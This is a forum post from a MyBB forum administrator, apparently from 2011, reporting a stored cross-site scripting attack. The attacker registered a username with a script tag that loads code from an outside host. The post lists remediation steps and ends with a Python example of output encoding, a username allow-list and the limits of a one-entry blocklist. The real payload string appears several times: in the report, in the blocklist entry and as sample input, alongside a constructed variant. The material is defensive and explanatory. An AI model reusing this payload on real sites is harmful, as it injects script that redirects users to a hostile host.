2011-11-29, 01:10 PM
http://www.dashingforums.com
So about an hour ago I had a member successfully register with the following username:
Andre Dejavu</noscript><script src="http://surabayag3tar.x4host.eu/"></script>
The Javascript was accepted and the username was accepted. This led to any page mentioning his username (such as the index, because they were the newest member, their profile page, and the user page in the Admin CP) redirecting to the site sourced in the script.
Screenshot:
For other people experiencing the same, this is how I resolved the issue:
1) Banned member:
Andre Dejavu</noscript><script src="http://surabayag3tar.x4host.eu/"></script>
2) Downloaded NoScripts (Chrome Extension). I suspect NoScript for Firefox would work as well but I have not confirmed this.
3) With NoScripts enabled, I was able to edit the username so that the script was no longer present (so the member is now 'Andre Dejavu').
4) Added the following to disallowed usernames (haven't tested yet):
*</noscript><script src="http://surabayag3tar.x4host.eu/"></script>
The guy is bragging about other hacks on his Facebook page, but I'm not sure how many of those are using the MyBB software:
https://www.facebook.com/specialone.andre
Anyway, I hope my information was clear and that you can find a solution to prevent this in the future. It wasn't the worst of attacks, but the fact that it was so simple to pull off astounds me.
Hope to hear from you guys soon,
- Fanta
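The post describes a stored cross-site scripting issue: a username containing HTML was stored and then written into pages (index, profile, Admin CP) without being encoded, so the attacker's external script ran in the browser of anyone viewing those pages, including the administrator. The example below is added here and is not MyBB code or the poster's; it is written in Python purely to show the two server-side controls that would have stopped it (encode the name at output time, and only accept a safe character set at registration), using the exact username quoted in the post as constructed sample input. The username allow-list pattern, the link markup, and the assumption that the "disallowed usernames" list behaves like shell-style wildcard matching are all illustrative assumptions, not MyBB's actual rules.

```python
import html
import re
from fnmatch import fnmatchcase

# Constructed sample input: the username quoted in the post, and the cleaned-up
# name the admin settled on.
PAYLOAD_NAME = (
    'Andre Dejavu</noscript>'
    '<script src="http://surabayag3tar.x4host.eu/"></script>'
)
BENIGN_NAME = "Andre Dejavu"

# Assumed registration allow-list (illustration only, not MyBB's rule):
# letters, digits, space, dot, underscore and hyphen, 3 to 30 characters.
USERNAME_RE = re.compile(r"^[A-Za-z0-9 ._-]{3,30}$")


def is_valid_username(name: str) -> bool:
    """Input control: accept only characters from the allow-list, so no
    markup or script delimiters can ever be stored as a display name."""
    return USERNAME_RE.fullmatch(name) is not None


def render_member_link_unsafe(name: str, uid: int) -> str:
    """The vulnerable pattern described in the post: the stored name is
    concatenated straight into the HTML of every page that shows it."""
    return f'<a href="member.php?action=profile&amp;uid={int(uid)}">{name}</a>'


def render_member_link(name: str, uid: int) -> str:
    """Output control: HTML-encode the name for the element-content context.
    Even if a hostile name is already in the database, it renders as text."""
    safe = html.escape(name, quote=True)  # escapes & < > " '
    return f'<a href="member.php?action=profile&amp;uid={int(uid)}">{safe}</a>'


def blocklist_matches(name: str, patterns) -> bool:
    """Models the 'disallowed usernames' wildcard entry the poster added,
    assuming shell-style globbing. Shown to illustrate why a blocklist of one
    payload is not a fix: any variation of the script URL slips past it."""
    return any(fnmatchcase(name, p) for p in patterns)


def assess(name: str, patterns) -> dict:
    """Run the sample name through all three checks and report the results."""
    return {
        "allow_list_accepts": is_valid_username(name),
        "blocklist_catches": blocklist_matches(name, patterns),
        "unsafe_render_contains_script": "<script" in render_member_link_unsafe(name, 1),
        "encoded_render_contains_script": "<script" in render_member_link(name, 1),
    }


if __name__ == "__main__":
    # The wildcard entry from the post, and a trivially varied payload
    # (constructed) that the same entry does not match.
    disallowed = ['*</noscript><script src="http://surabayag3tar.x4host.eu/"></script>']
    variant = PAYLOAD_NAME.replace('x4host.eu/"', 'x4host.eu/x"')
    for label, n in (("payload", PAYLOAD_NAME), ("variant", variant), ("benign", BENIGN_NAME)):
        print(label, assess(n, disallowed))
```

The take-away for anyone hitting this: the wildcard "disallowed username" entry only blocks that one exact string, so it is a stop-gap at best; the durable fix is encoding the username wherever it is displayed (the Admin CP included, since that is where the administrator was redirected) and rejecting usernames outside a narrow character set at registration. Editing the record with NoScript enabled worked for the same reason the attack did: the script runs in whichever browser renders the page, so blocking script execution in the admin's browser made the edit page usable.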